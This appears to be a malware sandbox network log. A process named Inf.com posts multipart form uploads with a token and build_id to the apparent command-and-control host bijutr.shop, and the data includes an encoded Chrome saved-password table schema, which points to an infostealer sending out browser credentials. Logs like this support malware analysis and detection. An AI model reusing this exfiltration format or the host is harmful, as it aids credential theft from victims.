                                                                                                                                                                                                                                                                            2024-12-27 06:10:58 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 53 52 31 44 4a 35 38 47 44 54 52 49 4d 37 47 44 4a 35 58 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 32 32 33 62 65 37 37 32 64 33 33 36 33 65 38 33 38 37 64 64 36 38 35 37 37 65 64 61 61 34 30 0d 0a 2d 2d 2d 2d 2d 2d 53 52 31 44 4a 35 38 47 44 54 52 49 4d 37 47 44 4a 35 58 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 53 52 31 44 4a 35 38 47 44 54 52 49 4d 37 47 44 4a 35 58 4c 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                            Data Ascii: ------SR1DJ58GDTRIM7GDJ5XLContent-Disposition: form-data; name="token"1223be772d3363e8387dd68577edaa40------SR1DJ58GDTRIM7GDJ5XLContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------SR1DJ58GDTRIM7GDJ5XLCont
                                                                                                                                                                                                                                                                            2024-12-27 06:10:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                            2024-12-27 06:10:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                            2024-12-27 06:10:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                            2024-12-27 06:10:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                            2024-12-27 06:10:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                            2024-12-27 06:10:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                            2024-12-27 06:10:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                            2024-12-27 06:10:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                            2024-12-27 06:10:58 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                            2024-12-27 06:11:00 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:11:00 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                            Connection: close


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            36192.168.2.649996188.245.216.2054436636C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:11:00 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----SJW4W4OHLXBIEU3EUA1V
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                            Host: bijutr.shop
                                                                                                                                                                                                                                                                            Content-Length: 55081
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            2024-12-27 06:11:00 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 53 4a 57 34 57 34 4f 48 4c 58 42 49 45 55 33 45 55 41 31 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 32 32 33 62 65 37 37 32 64 33 33 36 33 65 38 33 38 37 64 64 36 38 35 37 37 65 64 61 61 34 30 0d 0a 2d 2d 2d 2d 2d 2d 53 4a 57 34 57 34 4f 48 4c 58 42 49 45 55 33 45 55 41 31 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 53 4a 57 34 57 34 4f 48 4c 58 42 49 45 55 33 45 55 41 31 56 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                            Data Ascii: ------SJW4W4OHLXBIEU3EUA1VContent-Disposition: form-data; name="token"1223be772d3363e8387dd68577edaa40------SJW4W4OHLXBIEU3EUA1VContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------SJW4W4OHLXBIEU3EUA1VCont
                                                                                                                                                                                                                                                                            2024-12-27 06:11:00 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                            2024-12-27 06:11:00 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                            Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                            2024-12-27 06:11:00 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                            2024-12-27 06:11:02 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                            Date: Fri, 27 Dec 2024 06:11:02 GMT
                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                            2024-12-27 06:11:02 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                            37192.168.2.650002188.245.216.2054436636C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:11:02 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----3EUA1N7YM7GV37Q1VKX4
                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                            Host: bijutr.shop
                                                                                                                                                                                                                                                                            Content-Length: 142457
                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                            2024-12-27 06:11:02 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 33 45 55 41 31 4e 37 59 4d 37 47 56 33 37 51 31 56 4b 58 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 32 32 33 62 65 37 37 32 64 33 33 36 33 65 38 33 38 37 64 64 36 38 35 37 37 65 64 61 61 34 30 0d 0a 2d 2d 2d 2d 2d 2d 33 45 55 41 31 4e 37 59 4d 37 47 56 33 37 51 31 56 4b 58 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 33 45 55 41 31 4e 37 59 4d 37 47 56 33 37 51 31 56 4b 58 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                            Data Ascii: ------3EUA1N7YM7GV37Q1VKX4Content-Disposition: form-data; name="token"1223be772d3363e8387dd68577edaa40------3EUA1N7YM7GV37Q1VKX4Content-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------3EUA1N7YM7GV37Q1VKX4Cont
                                                                                                                                                                                                                                                                            2024-12-27 06:11:02 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
